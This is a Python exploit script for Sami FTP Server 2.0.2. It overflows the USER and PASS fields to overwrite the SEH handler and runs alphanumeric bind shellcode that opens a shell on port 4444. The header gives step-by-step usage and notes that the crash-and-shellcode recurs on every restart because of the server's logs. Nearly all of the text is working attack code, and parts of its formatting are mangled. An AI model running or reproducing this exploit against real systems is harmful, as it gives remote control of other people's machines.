#/usr/bin/python#-*- Coding: utf-8 -*-### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### # Date: 2016-01-11# Exploit Author: n30m1nd# Vendor Homepage: http://www.karjasoft.com/# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe# Version: 2.0.2# Tested on: Win7 64bit and Win10 64 bit# Credits# =======# Thanks to PHRACK for maintaining all the articles up for so much time... # These are priceless and still current for exploit development!!# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better# How to# ======# * Open Sami FTP Server and open its graphical interface# * Run this python script and write the IP to attack# * Connect to the same IP on port 4444## BONUS# =====# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each# start and so, it will crash and run our shellcode everytime it starts.# Why?# ====# The graphical interface tries to show the user name which produces an overflow overwriting SEH# Exploit code# ============import socket
import struct
defdoHavoc(ipaddr):# Bad chars: 00 0d 0a ff
alignment ="\x90"*3
jmpfront ="345A7504".decode('hex')#CPU Disasm#Hex dump Command # 34 5A XOR AL,5A# 75 04 JNE SHORT +04# pop pop ret in tmp01.dll
popret =0x10022ADE# fstenv trick to get eip: phrack number 62# and store it into EAX for the metasploit shell (BufferRegister)
getEIPinEAX ="D9EED934E48B44E40C040b".decode('hex')#CPU Disasm#Hex dump Command# D9EE FLDZ# D934E4 FSTENV SS:[ESP]# 8B44E4 0C MOV EAX,DWORD PTR SS:[ESP+0C]# 04 0B ADD AL,0B# Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX
shellcode =(
getEIPinEAX +"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p""e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq""xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc""VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ""yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb""8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9""op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP""qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq""Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6""GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm""sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3""ioJuAA")# Final payload, SEH overwrite ocurrs at 600 bytes
payload = alignment +"."*(600-len(alignment)-len(jmpfront))+ jmpfront + struct.pack("<L", popret)+ shellcode
s = socket.create_connection((ipaddr,21))
s.send("USER "+ payload +"\r\n")print s.recv(4096)
s.send("PASS "+ payload +"\r\n")print s.recv(4096)print s.recv(4096)except e:printstr(e)
exit("[+] Couldn't connect")if __name__ =="__main__":
ipaddr =raw_input("[+] IP: ")
doHavoc(ipaddr)whileraw_input("[?] Got shell?(y/n) ").lower()=="n":
doHavoc(ipaddr)print"[+] Enjoy..."